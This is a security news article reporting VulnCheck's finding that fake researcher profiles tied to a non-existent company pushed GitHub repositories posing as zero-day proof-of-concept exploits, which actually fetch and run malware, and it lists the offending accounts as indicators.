Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits
14.6.23  Virus  The Hacker News
GitHub Repositories as PoC Exploits
At least half of dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service.

All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange Server.

VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security."

The cybersecurity firm said it first came across the rogue repositories in early May when they were observed releasing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down.

Besides sharing some of the purported findings on Twitter in an attempt to build legitimacy, the set of accounts have been found to use headshots of actual security researchers from companies like Rapid7, suggesting that the threat actors have gone to great lengths to execute the campaign.

GitHub Repositories as PoC Exploits
The PoC is a Python script that's designed to download a malicious binary and execute it on the victim's operating system, be it Windows or Linux.
The list of GitHub repositories and fake Twitter accounts is below -

github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
github.com/BAdithyaHSCS/Exchange-0-Day
github.com/DLandonHSCS/Discord-RCE
github.com/GSandersonHSCS/discord-0-day-fix
github.com/MHadzicHSCS/Chrome-0-day
github.com/RShahHSCS/Discord-0-Day-Exploit
github.com/SsankkarHSCS/Chromium-0-Day
twitter.com/AKuzmanHSCS
twitter.com/DLandonHSCS
twitter.com/GSandersonHSCS
twitter.com/MHadzicHSCS
"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware," VulnCheck researcher Jacob Baines said. "It's unclear if they have been successful, but given that they've continued to pursue this avenue of attacks, it seems they believe they will be successful."

It's currently not known if this is the work of an amateur actor or an advanced persistent threat (APT). But security researchers have previously come under the radar of North Korean nation-state groups, as revealed by Google in January 2021.

If anything, the findings show the need for exercising caution when it comes to downloading code from open source repositories. It's also essential that users scrutinize the code prior to execution to ensure they don't pose any security risks.